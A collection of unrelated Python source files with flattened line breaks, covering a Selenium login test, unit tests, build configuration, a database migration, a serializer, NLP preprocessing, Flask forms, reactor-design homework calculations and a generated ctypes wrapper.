from selenium import webdriver browser = webdriver.Firefox(executable_path=r"C:\Windows\geckodriver.exe") browser.get("https://github.com") browser.maximize_window() browser.implicitly_wait(20) sign_in = browser.find_element_by_link_text("Sign in") sign_in.click() user_name = browser.find_element_by_id("login_field") user_name.send_keys("user_name") password = browser.find_element_by_id("password") password.send_keys("password") password.submit() profile_link = browser.find_element_by_class_name("user-profile-link") link_label = profile_link.get_attribute("innerHTML") assert "username" in link_label browser.quit()
python
import unittest import Models class BasicTestMethods(unittest.TestCase): def test_asdf(self): self.assertEqual(Models.asdf(), "asdf", 'nah') self.assertNotEqual(Models.asdf(), "asdf1", 'nah') #self.assertEqual(asdf(), "asdf1", 'nah') if __name__ == '__main__': unittest.main()
python
#!/usr/bin/env python """AVIM build configuration""" from os import path from datetime import date from build import BuildConfig # Type of build to produce. CONFIG = BuildConfig.RELEASE # Incremented version number. # See <https://developer.mozilla.org/en-US/docs/Toolkit_version_format>. VERSION = (5, 8, 2) # Build date. DATE = None # Name to use in the build's directories. PACKAGE_NAME = "avim" # Paths to directories that consitute the chrome JAR file. CHROME_PROVIDERS = ["content", "locale", "skin"] # Paths to miscellaneous files that should be included in the build's root # directory. install.rdf and chrome.manifest are automatically included. ROOT_FILES = ["LICENSE"] # Paths to directories that should be included, uncompressed, in the build's # root directory. ROOT_DIRS = ["components", "defaults"] # Paths to files to be preprocessed. These files contain placeholders that # should be interpreted as variables. VAR_FILES = ["install.rdf", "chrome.manifest", "LICENSE", path.join("content", "options.xul")] # File extensions of files to be preprocessed. VAR_EXTS = ["js"] # Names of files to be preprocessed. VAR_NAMES = ["options.dtd"] # Paths to directories that should be omitted from a release build. DEBUG_DIRS = [path.join("originals"), path.join("tests"), path.join("content", "test"), path.join("content", "skin", "test"), path.join("skin", "test"), # Unmaintained localizations path.join("locale", "fr"), path.join("locale", "zh-TW")] # Names of localization files that should be omitted from a release build. L10N_FILES = ["amo.dtd", "install.dtd"] # Dictionary mapping subdirectories of locale/ to BabelZilla-compatible locale # codes. Locale names that are already compatible can be omitted. LOCALE_DIRS = {"en": "en-US", "es": "es-ES"} # Name of the fallback locale that is guaranteed to contain translations for all # the extension's strings and that contains documentation for each string. MAIN_LOCALE = "en-US" # Paths to the final XPI files. XPI_FILES = ["%(package)s.xpi", "%(package)s-%(version)s.xpi"]
python
import sys sys.path.append('../src/') print(sys.path) import Histograms import unittest import numpy import time class MyTestCase(unittest.TestCase): def setUp(self): pass def test_learnSingleton(self): m = Histograms.Histograms({ "histograms": ["test"] , "AllowLimit": 10 , "LearnLimit": 3 , "collectorId": "mygate" , "minimumLearning": 100 }) for i in range(1000): r = m.assess({'histograms': [[4, 4, 0, 1E10-1, 0, 0]]}) print(r) print(m.mean) self.assertLess(r[0], 0.25) m.learn() print(m.keys) self.assertEqual(len(m.keys["test-01"]), 1) self.assertAlmostEqual(m.mean[0][0], 1.0, delta=0.05) self.assertLess(m.sdev[0][0], 0.2) def test_store_load(self): m = Histograms.Histograms({ "histograms": ["test"] , "AllowLimit": 10 , "LearnLimit": 3 , "collectorId": "mygate" , "minimumLearning": 100 }) for i in range(1000): r = m.assess({'histograms': [[4, 4, 0, 1E10-1, 0, 0]]}) print (r) self.assertLess(r[0], 0.25) m.learn() status = {} m.crdstore(status) print(status) self.assertTrue("histograms" in status) values = status["histograms"] self.assertTrue(isinstance(values, dict)) self.assertTrue("_n" in values) self.assertEqual(values["_n"], 1000) self.assertTrue("test-01" in values) val = values["test-01"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(1000, val["s"], delta=10) self.assertAlmostEqual(1000, val["s2"], delta=10) self.assertTrue("test-12" in values) val = values["test-12"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(5000, val["s"], delta=10) self.assertAlmostEqual(25000, val["s2"], delta=100) self.assertTrue("test-23" in values) val = values["test-23"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(1E-7, val["s"] , delta=1E-7) self.assertAlmostEqual(1E-10, val["s2"], delta=1E-6) self.assertTrue("test-34" in values) val = values["test-34"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertGreaterEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(1000000, val["s"] , delta=100) self.assertAlmostEqual(10000000, val["s2"], delta=1000) self.assertTrue("test-45" in values) val = values["test-45"] self.assertTrue(isinstance(val, dict)) keys = list(val.keys()) self.assertEqual(len(keys), 1) key = keys[0] val = val[key] self.assertTrue(isinstance(val, dict)) self.assertTrue("c" in val) self.assertTrue("s" in val) self.assertTrue("s2" in val) self.assertAlmostEqual(1000, val["c"], delta=10) self.assertAlmostEqual(10, val["s"] , delta=1) self.assertAlmostEqual(0.1, val["s2"], delta=0.01)
python
"""User details and sex of patient added Revision ID: 7d4bab0acebb Revises: b4bb7697ace6 Create Date: 2017-09-14 14:53:07.958616 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '7d4bab0acebb' down_revision = 'b4bb7697ace6' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column('patients', sa.Column('sex', sa.String(length=1), nullable=True)) op.add_column('users', sa.Column('f_name', sa.String(length=50), nullable=True)) op.add_column('users', sa.Column('initials', sa.String(length=10), nullable=True)) op.add_column('users', sa.Column('l_name', sa.String(length=50), nullable=True)) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_column('users', 'l_name') op.drop_column('users', 'initials') op.drop_column('users', 'f_name') op.drop_column('patients', 'sex') # ### end Alembic commands ###
python
""" Author: Justin Cappos Start date: October 9th, 2009 Purpose: A simple library that serializes and deserializes built-in repy types. This includes strings, integers, floats, booleans, None, complex, tuples, lists, sets, frozensets, and dictionaries. There are no plans for including objects. Note: that all items are treated as separate references. This means things like 'a = []; a.append(a)' will result in an infinite loop. If you have 'b = []; c = (b,b)' then 'c[0] is c[1]' is True. After deserialization 'c[0] is c[1]' is False. I can add support or detection of this if desired. """ # The basic idea is simple. Say the type (a character) followed by the # type specific data. This is adequate for simple types # that do not contain other types. Types that contain other types, have # a length indicator and then the underlying items listed sequentially. # For a dict, this is key1value1key2value2. def serializedata(data): """ <Purpose> Convert a data item of any type into a string such that we can deserialize it later. <Arguments> data: the thing to seriailize. Can be of essentially any type except objects. <Exceptions> TypeError if the type of 'data' isn't allowed <Side Effects> None. <Returns> A string suitable for deserialization. """ # this is essentially one huge case statement... # None if type(data) == type(None): return 'N' # Boolean elif type(data) == type(True): if data == True: return 'BT' else: return 'BF' # Integer / Long elif type(data) is int or type(data) is long: datastr = str(data) return 'I'+datastr # Float elif type(data) is float: datastr = str(data) return 'F'+datastr # Complex elif type(data) is complex: datastr = str(data) if datastr[0] == '(' and datastr[-1] == ')': datastr = datastr[1:-1] return 'C'+datastr # String elif type(data) is str: return 'S'+data # List or tuple or set or frozenset elif type(data) is list or type(data) is tuple or type(data) is set or type(data) is frozenset: # the only impact is the first letter... if type(data) is list: mystr = 'L' elif type(data) is tuple: mystr = 'T' elif type(data) is set: mystr = 's' elif type(data) is frozenset: mystr = 'f' else: raise Exception("InternalError: not a known type after checking") for item in data: thisitem = serializedata(item) # Append the length of the item, plus ':', plus the item. 1 -> '2:I1' mystr = mystr + str(len(thisitem))+":"+thisitem mystr = mystr + '0:' return mystr # dict elif type(data) is dict: mystr = 'D' keysstr = serializedata(data.keys()) # Append the length of the list, plus ':', plus the list. mystr = mystr + str(len(keysstr))+":"+keysstr # just plop the values on the end. valuestr = serializedata(data.values()) mystr = mystr + valuestr return mystr # Unknown!!! else: raise TypeError("Unknown type '"+str(type(data))+"' for data :"+str(data)) def deserializedata(datastr): """ <Purpose> Convert a serialized data string back into its original types. <Arguments> datastr: the string to deseriailize. <Exceptions> ValueError if the string is corrupted TypeError if the type of 'data' isn't allowed <Side Effects> None. <Returns> Items of the original type """ if type(datastr) != str: raise TypeError("Cannot deserialize non-string of type '"+str(type(datastr))+"'") typeindicator = datastr[0] restofstring = datastr[1:] # this is essentially one huge case statement... # None if typeindicator == 'N': if restofstring != '': raise ValueError("Malformed None string '"+restofstring+"'") return None # Boolean elif typeindicator == 'B': if restofstring == 'T': return True elif restofstring == 'F': return False raise ValueError("Malformed Boolean string '"+restofstring+"'") # Integer / Long elif typeindicator == 'I': try: return int(restofstring) except ValueError: raise ValueError("Malformed Integer string '"+restofstring+"'") # Float elif typeindicator == 'F': try: return float(restofstring) except ValueError: raise ValueError("Malformed Float string '"+restofstring+"'") # Float elif typeindicator == 'C': try: return complex(restofstring) except ValueError: raise ValueError("Malformed Complex string '"+restofstring+"'") # String elif typeindicator == 'S': return restofstring # List / Tuple / set / frozenset / dict elif typeindicator == 'L' or typeindicator == 'T' or typeindicator == 's' or typeindicator == 'f': # We'll split this and keep adding items to the list. At the end, we'll # convert it to the right type thislist = [] data = restofstring # We'll use '0:' as our 'end separator' while data != '0:': lengthstr, restofdata = data.split(':', 1) length = int(lengthstr) # get this item, convert to a string, append to the list. thisitemdata = restofdata[:length] thisitem = deserializedata(thisitemdata) thislist.append(thisitem) # Now toss away the part we parsed. data = restofdata[length:] if typeindicator == 'L': return thislist elif typeindicator == 'T': return tuple(thislist) elif typeindicator == 's': return set(thislist) elif typeindicator == 'f': return frozenset(thislist) else: raise Exception("InternalError: not a known type after checking") elif typeindicator == 'D': lengthstr, restofdata = restofstring.split(':', 1) length = int(lengthstr) # get this item, convert to a string, append to the list. keysdata = restofdata[:length] keys = deserializedata(keysdata) # The rest should be the values list. values = deserializedata(restofdata[length:]) if type(keys) != list or type(values) != list or len(keys) != len(values): raise ValueError("Malformed Dict string '"+restofstring+"'") thisdict = {} for position in xrange(len(keys)): thisdict[keys[position]] = values[position] return thisdict # Unknown!!! else: raise ValueError("Unknown typeindicator '"+str(typeindicator)+"' for data :"+str(restofstring))
python
""" Author: William Gabriel Carreras Oropesa Date: April 19, 2020, Neuqué, Argentina module body: This module has implemented a series of functions and objects that will be useful when solving the problem of the N bodies. """ # necessary modules import numpy as np from copy import copy class body(object): def __init__(self, mass, rVec): super(body, self).__init__() self.mass = mass self.rVec = rVec self.vVec = np.array([0, 0], dtype=float) def __str__(self): return "body object: M = {}, R = ({}, {}), V = ({}, {})".format(self.mass, self.rVec[0], self.rVec[1], self.vVec[0], self.vVec[1]) def setV(self, newV): self.vVec = newV def setR(self, newR): self.rVec = newR def gravitationForce(self, P): return (P.mass * (P.rVec - self.rVec))/np.linalg.norm(P.rVec - self.rVec)**3
python
import logging import multiprocessing import unicodedata from argparse import Namespace from contextlib import closing from itertools import chain, repeat from multiprocessing.pool import Pool from tqdm import tqdm from transformers.tokenization_roberta import RobertaTokenizer logger = logging.getLogger(__name__) class InputFeatures(object): def __init__( self, unique_id, example_index, doc_span_index, tokens, mentions, token_to_orig_map, token_is_max_context, word_ids, word_segment_ids, word_attention_mask, entity_ids, entity_position_ids, entity_segment_ids, entity_attention_mask, start_positions, end_positions, ): self.unique_id = unique_id self.example_index = example_index self.doc_span_index = doc_span_index self.tokens = tokens self.mentions = mentions self.token_to_orig_map = token_to_orig_map self.token_is_max_context = token_is_max_context self.word_ids = word_ids self.word_segment_ids = word_segment_ids self.word_attention_mask = word_attention_mask self.entity_ids = entity_ids self.entity_position_ids = entity_position_ids self.entity_segment_ids = entity_segment_ids self.entity_attention_mask = entity_attention_mask self.start_positions = start_positions self.end_positions = end_positions def convert_examples_to_features( examples, tokenizer, entity_vocab, wiki_link_db, model_redirect_mappings, link_redirect_mappings, max_seq_length, max_mention_length, doc_stride, max_query_length, min_mention_link_prob, segment_b_id, add_extra_sep_token, is_training, pool_size=multiprocessing.cpu_count(), chunk_size=30, ): passage_encoder = PassageEncoder( tokenizer, entity_vocab, wiki_link_db, model_redirect_mappings, link_redirect_mappings, max_mention_length, min_mention_link_prob, add_extra_sep_token, segment_b_id, ) worker_params = Namespace( tokenizer=tokenizer, max_seq_length=max_seq_length, doc_stride=doc_stride, max_query_length=max_query_length, add_extra_sep_token=add_extra_sep_token, passage_encoder=passage_encoder, is_training=is_training, ) features = [] unique_id = 1000000000 with closing(Pool(pool_size, initializer=_initialize_worker, initargs=(worker_params,))) as pool: with tqdm(total=len(examples)) as pbar: for ret in pool.imap(_process_example, enumerate(examples), chunksize=chunk_size): for feature in ret: feature.unique_id = unique_id features.append(feature) unique_id += 1 pbar.update() return features class PassageEncoder(object): def __init__( self, tokenizer, entity_vocab, wiki_link_db, model_redirect_mappings, link_redirect_mappings, max_mention_length, min_mention_link_prob, add_extra_sep_token, segment_b_id, ): self._tokenizer = tokenizer self._entity_vocab = entity_vocab self._wiki_link_db = wiki_link_db self._model_redirect_mappings = model_redirect_mappings self._link_redirect_mappings = link_redirect_mappings self._max_mention_length = max_mention_length self._add_extra_sep_token = add_extra_sep_token self._segment_b_id = segment_b_id self._min_mention_link_prob = min_mention_link_prob def encode(self, title, tokens_a, tokens_b): if self._add_extra_sep_token: mid_sep_tokens = [self._tokenizer.sep_token] * 2 else: mid_sep_tokens = [self._tokenizer.sep_token] all_tokens = [self._tokenizer.cls_token] + tokens_a + mid_sep_tokens + tokens_b + [self._tokenizer.sep_token] word_ids = self._tokenizer.convert_tokens_to_ids(all_tokens) word_segment_ids = [0] * (len(tokens_a) + len(mid_sep_tokens) + 1) + [self._segment_b_id] * (len(tokens_b) + 1) word_attention_mask = [1] * len(all_tokens) try: title = self._link_redirect_mappings.get(title, title) mention_candidates = {} ambiguous_mentions = set() for link in self._wiki_link_db.get(title): if link.link_prob < self._min_mention_link_prob: continue link_text = self._normalize_mention(link.text) if link_text in mention_candidates and mention_candidates[link_text] != link.title: ambiguous_mentions.add(link_text) continue mention_candidates[link_text] = link.title for link_text in ambiguous_mentions: del mention_candidates[link_text] except KeyError: mention_candidates = {} logger.warning("Not found in the Dump DB: %s", title) mentions_a = self._detect_mentions(tokens_a, mention_candidates) mentions_b = self._detect_mentions(tokens_b, mention_candidates) all_mentions = mentions_a + mentions_b if not all_mentions: entity_ids = [0, 0] entity_segment_ids = [0, 0] entity_attention_mask = [0, 0] entity_position_ids = [[-1 for y in range(self._max_mention_length)]] * 2 else: entity_ids = [0] * len(all_mentions) entity_segment_ids = [0] * len(mentions_a) + [self._segment_b_id] * len(mentions_b) entity_attention_mask = [1] * len(all_mentions) entity_position_ids = [[-1 for y in range(self._max_mention_length)] for x in range(len(all_mentions))] offset_a = 1 offset_b = len(tokens_a) + 2 # 2 for CLS and SEP tokens if self._add_extra_sep_token: offset_b += 1 for i, (offset, (entity_id, start, end)) in enumerate( chain(zip(repeat(offset_a), mentions_a), zip(repeat(offset_b), mentions_b)) ): entity_ids[i] = entity_id entity_position_ids[i][: end - start] = range(start + offset, end + offset) if len(all_mentions) == 1: entity_ids.append(0) entity_segment_ids.append(0) entity_attention_mask.append(0) entity_position_ids.append([-1 for y in range(self._max_mention_length)]) return dict( tokens=all_tokens, mentions=all_mentions, word_ids=word_ids, word_segment_ids=word_segment_ids, word_attention_mask=word_attention_mask, entity_ids=entity_ids, entity_position_ids=entity_position_ids, entity_segment_ids=entity_segment_ids, entity_attention_mask=entity_attention_mask, ) def _detect_mentions(self, tokens, mention_candidates): mentions = [] cur = 0 for start, token in enumerate(tokens): if start < cur: continue if self._is_subword(token): continue for end in range(min(start + self._max_mention_length, len(tokens)), start, -1): if end < len(tokens) and self._is_subword(tokens[end]): continue mention_text = self._tokenizer.convert_tokens_to_string(tokens[start:end]) mention_text = self._normalize_mention(mention_text) if mention_text in mention_candidates: cur = end title = mention_candidates[mention_text] title = self._model_redirect_mappings.get(title, title) # resolve mismatch between two dumps if title in self._entity_vocab: mentions.append((self._entity_vocab[title], start, end)) break return mentions def _is_subword(self, token): if isinstance(self._tokenizer, RobertaTokenizer): token = self._tokenizer.convert_tokens_to_string(token) if not token.startswith(" ") and not self._is_punctuation(token[0]): return True elif token.startswith("##"): return True return False @staticmethod def _is_punctuation(char): # obtained from: # https://github.com/huggingface/transformers/blob/5f25a5f367497278bf19c9994569db43f96d5278/transformers/tokenization_bert.py#L489 cp = ord(char) if (cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126): return True cat = unicodedata.category(char) if cat.startswith("P"): return True return False @staticmethod def _normalize_mention(text): return " ".join(text.lower().split(" ")).strip() params = None def _initialize_worker(_params): global params params = _params def _process_example(args): example_index, example = args tokenizer = params.tokenizer query_tokens = _tokenize(example.question_text) if len(query_tokens) > params.max_query_length: query_tokens = query_tokens[0 : params.max_query_length] tok_to_orig_index = [] orig_to_tok_index = [] all_doc_tokens = [] for i, token in enumerate(example.doc_tokens): orig_to_tok_index.append(len(all_doc_tokens)) sub_tokens = _tokenize(token) for sub_token in sub_tokens: tok_to_orig_index.append(i) all_doc_tokens.append(sub_token) tok_start_positions = [] tok_end_positions = [] if params.is_training and not example.is_impossible: for start, end, answer_text in zip(example.start_positions, example.end_positions, example.answer_texts): tok_start = orig_to_tok_index[start] if end < len(example.doc_tokens) - 1: tok_end = orig_to_tok_index[end + 1] - 1 else: tok_end = len(all_doc_tokens) - 1 tok_start, tok_end = _improve_answer_span(all_doc_tokens, tok_start, tok_end, tokenizer, answer_text) tok_start_positions.append(tok_start) tok_end_positions.append(tok_end) max_tokens_for_doc = params.max_seq_length - len(query_tokens) - 3 if params.add_extra_sep_token: max_tokens_for_doc -= 1 doc_spans = [] start_offset = 0 while start_offset < len(all_doc_tokens): length = len(all_doc_tokens) - start_offset if length > max_tokens_for_doc: length = max_tokens_for_doc doc_spans.append(dict(start=start_offset, length=length)) if start_offset + length == len(all_doc_tokens): break start_offset += min(length, params.doc_stride) features = [] for doc_span_index, doc_span in enumerate(doc_spans): token_to_orig_map = {} token_is_max_context = {} answer_tokens = [] answer_offset = len(query_tokens) + 2 if params.add_extra_sep_token: answer_offset += 1 for i in range(doc_span["length"]): split_token_index = doc_span["start"] + i token_to_orig_map[answer_offset + i] = tok_to_orig_index[split_token_index] is_max_context = _check_is_max_context(doc_spans, doc_span_index, split_token_index) token_is_max_context[answer_offset + i] = is_max_context answer_tokens.append(all_doc_tokens[split_token_index]) start_positions = [] end_positions = [] if params.is_training: if example.is_impossible: start_positions = [0] end_positions = [0] else: doc_start = doc_span["start"] doc_end = doc_span["start"] + doc_span["length"] - 1 for tok_start, tok_end in zip(tok_start_positions, tok_end_positions): if not (tok_start >= doc_start and tok_end <= doc_end): continue doc_offset = len(query_tokens) + 2 if params.add_extra_sep_token: doc_offset += 1 start_positions.append(tok_start - doc_start + doc_offset) end_positions.append(tok_end - doc_start + doc_offset) if not start_positions: start_positions = [0] end_positions = [0] features.append( InputFeatures( unique_id=None, example_index=example_index, doc_span_index=doc_span_index, token_to_orig_map=token_to_orig_map, token_is_max_context=token_is_max_context, start_positions=start_positions, end_positions=end_positions, **params.passage_encoder.encode(example.title, query_tokens, answer_tokens) ) ) return features def _tokenize(text): if isinstance(params.tokenizer, RobertaTokenizer): return params.tokenizer.tokenize(text, add_prefix_space=True) else: return params.tokenizer.tokenize(text) def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer, orig_answer_text): """Returns tokenized answer spans that better match the annotated answer. Original version was obtained from here: https://github.com/huggingface/transformers/blob/23c6998bf46e43092fc59543ea7795074a720f08/src/transformers/data/processors/squad.py#L25 """ tok_answer_text = tokenizer.convert_tokens_to_string(_tokenize(orig_answer_text)).strip() for new_start in range(input_start, input_end + 1): for new_end in range(input_end, new_start - 1, -1): text_span = tokenizer.convert_tokens_to_string(doc_tokens[new_start : (new_end + 1)]).strip() if text_span == tok_answer_text: return new_start, new_end return input_start, input_end def _check_is_max_context(doc_spans, cur_span_index, position): """Check if this is the 'max context' doc span for the token. Original version was obtained from here: https://github.com/huggingface/transformers/blob/23c6998bf46e43092fc59543ea7795074a720f08/src/transformers/data/processors/squad.py#L38 """ best_score = None best_span_index = None for span_index, doc_span in enumerate(doc_spans): end = doc_span["start"] + doc_span["length"] - 1 if position < doc_span["start"]: continue if position > end: continue num_left_context = position - doc_span["start"] num_right_context = end - position score = min(num_left_context, num_right_context) + 0.01 * doc_span["length"] if best_score is None or score > best_score: best_score = score best_span_index = span_index return cur_span_index == best_span_index
python
name = input("Hello! What's your name? ") print('Nice to meet you \033[31m{}\033[m!'.format(name))
python
""" This file handles Reservation related HTTP request. """ from flask import request from flask_restplus import Resource from flask_jwt_extended import jwt_required from flask_jwt_extended.exceptions import NoAuthorizationError,InvalidHeaderError,RevokedTokenError from jwt import ExpiredSignatureError, InvalidTokenError, InvalidAudienceError # local imports from api.v1.main.service.rsvp_service import save_new_rsvp from api.v1.main.util.rvsp_dto import RsvpDto api = RsvpDto.api rsvp = RsvpDto.rsvp @api.route('/<int:meetup_id>/rsvp') @api.param('meetup_id', 'Meetup Identification') @api.errorhandler(NoAuthorizationError) @api.errorhandler(RevokedTokenError) @api.errorhandler(ExpiredSignatureError) @api.errorhandler(InvalidTokenError) @api.errorhandler(InvalidHeaderError) class CreateQuestion(Resource): @api.response(201, 'You have successfully reserved a meetup') @api.doc('Reserve a meetup') @api.expect(rsvp, validate=True) @api.doc(security='Bearer Auth') @jwt_required def post(self, meetup_id): """ Reserve a meetup """ input_data = request.json return save_new_rsvp(user_input=input_data, meetup_id=meetup_id)
python
from wtforms import Form, StringField, PasswordField, SubmitField, BooleanField from wtforms.validators import DataRequired, Length, Email from flask_wtf import FlaskForm class RegistrationForm(FlaskForm): email = StringField( 'Email', [DataRequired(), Email(), Length(min=6, max=36)]) username = StringField( 'Username', [DataRequired(), Length(min=3, max=36)]) password = PasswordField( 'Password', [DataRequired(), Length(min=8, max=36)]) remember_me = BooleanField('Remember Me') submit = SubmitField('Sign Up')
python
# !/usr/bin/env python # coding=utf-8 """ Calcs for HW3 """ from __future__ import print_function import sys import numpy as np from common import GOOD_RET, R_J, temp_c_to_k, k_at_new_temp, R_ATM, make_fig __author__ = 'hbmayes' def pfr_design_eq(x_out, x_in, vol, nuo, k): """ PFR design eq for HW3 problem 1, set up for f(Xi) = 0 for fsolve function :param x_in: initial conversion (unitless) :param x_out: final conversion (unitless) :param vol: PFR volume in L :param nuo: volumetric flow in L/min :param k: rate coefficient in 1/min :return: function residual (want close to zero) """ return vol - nuo / k * (4.0 * np.log(1 / (1 - x_out)) - 3.0 * x_out - 4.0 * np.log(1 / (1 - x_in)) + 3.0 * x_in) def cstr_design_eq(x_out, x_in, vol, nuo, k): """ PFR design eq for HW3 problem 1, set up for f(Xi) = 0 for fsolve function :param x_in: initial conversion (unitless) :param x_out: final conversion (unitless) :param vol: PFR volume in L :param nuo: volumetric flow in L/min :param k: rate coefficient in 1/min :return: function residual (want close to zero) """ return vol - nuo / k * (x_out - x_in) * (1 + 3 * x_out) / (1 - x_out) def r_dis_a(k, cao, x, k_equil): """ rate of consumption (disappearance) of species A for HW3 prob 1 :param k: rate coefficient at temp of interest (1/min) :param cao: initial concentration of A in mol/L :param x: conversion of A :return: rate in mol/L-mib """ return 2.0 * k * cao * (cao * np.square(1 - x) - x / (2 * k_equil)) def pfr_design(k, cao, x, k_equil, nuo): """ rate of consumption (disappearance) of species A for HW3 prob 1 :param k: rate coefficient at temp of interest (1/min) :param cao: initial concentration of A in mol/L :param x: conversion of A :return: rate in mol/L-mib """ return nuo / (2.0 * k * (cao * np.square(1 - x) - x / (2 * k_equil))) # noinspection PyTypeChecker def prob1a(): """ Given a few points, makes a line :return: nothing--saves a file with the graph """ cao = 0.2 # mol / L nuo = 10.0 # L / s k_equil = 20.0 # L / mol k = 0.2 # L / mol s fao = cao * nuo vol = 600.0 # L tau = vol / nuo # s # x_in = 0.0 # x_out = 0.65 x_in = np.zeros(4) x_out = np.empty(4) print(x_in) x_begin = 0.0 x_end = 0.65 x_cstr = np.array([x_begin, x_end]) x_pfr = np.linspace(x_end, x_end, 10001) neg_ra = r_dis_a(k, cao, x_pfr, k_equil) leven_cstr = np.empty(2) leven_cstr.fill(fao / neg_ra[-1]) leven_pfr = fao / neg_ra fig_name = 'lect06_alt' volume_limit = 2000 make_fig(fig_name, x_pfr, leven_pfr, x_label=r'conversion (X, unitless)', y_label=r'$\displaystyle\frac{F_{A0}}{-r_A} \left(L\right)$', x_lima=0.0, x_limb=0.65, y_lima=0.0, y_limb=volume_limit, color1="black", x_fill=x_cstr, y_fill=leven_cstr, x2_fill=x_pfr, y2_fill=leven_pfr, # fill1_label="CSTR", fill2_label="PFR", ) print("yo") def main(): """ Runs the main program. """ prob1a() return GOOD_RET # success if __name__ == '__main__': status = main() sys.exit(status)
python
'''Wrapper for nviz.h Generated with: ./ctypesgen.py --cpp gcc -E -I/Applications/GRASS-7.8.app/Contents/Resources/include -D_Nullable= -I/Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include -I/Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include -D__GLIBC_HAVE_LONG_LONG -lgrass_nviz.7.8 /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h -o OBJ.x86_64-apple-darwin18.7.0/nviz.py Do not modify this file. ''' __docformat__ = 'restructuredtext' _libs = {} _libdirs = [] from .ctypes_preamble import * from .ctypes_preamble import _variadic_function from .ctypes_loader import * add_library_search_dirs([]) # Begin libraries _libs["grass_nviz.7.8"] = load_library("grass_nviz.7.8") # 1 libraries # End libraries # No modules # /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/Frameworks/OpenGL.framework/Headers/CGLTypes.h: 45 class struct__CGLContextObject(Structure): pass CGLContextObj = POINTER(struct__CGLContextObject) # /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/Frameworks/OpenGL.framework/Headers/CGLTypes.h: 45 GLubyte = c_uint8 # /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/Frameworks/OpenGL.framework/Headers/gltypes.h: 18 # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 76 class struct_anon_1348(Structure): pass struct_anon_1348.__slots__ = [ 'id', 'brt', 'r', 'g', 'b', 'ar', 'ag', 'ab', 'x', 'y', 'z', 'w', ] struct_anon_1348._fields_ = [ ('id', c_int), ('brt', c_float), ('r', c_float), ('g', c_float), ('b', c_float), ('ar', c_float), ('ag', c_float), ('ab', c_float), ('x', c_float), ('y', c_float), ('z', c_float), ('w', c_float), ] light_data = struct_anon_1348 # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 76 # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 78 class struct_fringe_data(Structure): pass struct_fringe_data.__slots__ = [ 'id', 'color', 'elev', 'where', ] struct_fringe_data._fields_ = [ ('id', c_int), ('color', c_ulong), ('elev', c_float), ('where', c_int * 4), ] # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 86 class struct_arrow_data(Structure): pass struct_arrow_data.__slots__ = [ 'color', 'size', 'where', ] struct_arrow_data._fields_ = [ ('color', c_ulong), ('size', c_float), ('where', c_float * 3), ] # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 93 class struct_scalebar_data(Structure): pass struct_scalebar_data.__slots__ = [ 'id', 'color', 'size', 'where', ] struct_scalebar_data._fields_ = [ ('id', c_int), ('color', c_ulong), ('size', c_float), ('where', c_float * 3), ] # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 130 class struct_anon_1349(Structure): pass struct_anon_1349.__slots__ = [ 'zrange', 'xyrange', 'num_cplanes', 'cur_cplane', 'cp_on', 'cp_trans', 'cp_rot', 'light', 'num_fringes', 'fringe', 'draw_arrow', 'arrow', 'num_scalebars', 'scalebar', 'bgcolor', ] struct_anon_1349._fields_ = [ ('zrange', c_float), ('xyrange', c_float), ('num_cplanes', c_int), ('cur_cplane', c_int), ('cp_on', c_int * 6), ('cp_trans', (c_float * 3) * 6), ('cp_rot', (c_float * 3) * 6), ('light', light_data * 3), ('num_fringes', c_int), ('fringe', POINTER(POINTER(struct_fringe_data))), ('draw_arrow', c_int), ('arrow', POINTER(struct_arrow_data)), ('num_scalebars', c_int), ('scalebar', POINTER(POINTER(struct_scalebar_data))), ('bgcolor', c_int), ] nv_data = struct_anon_1349 # 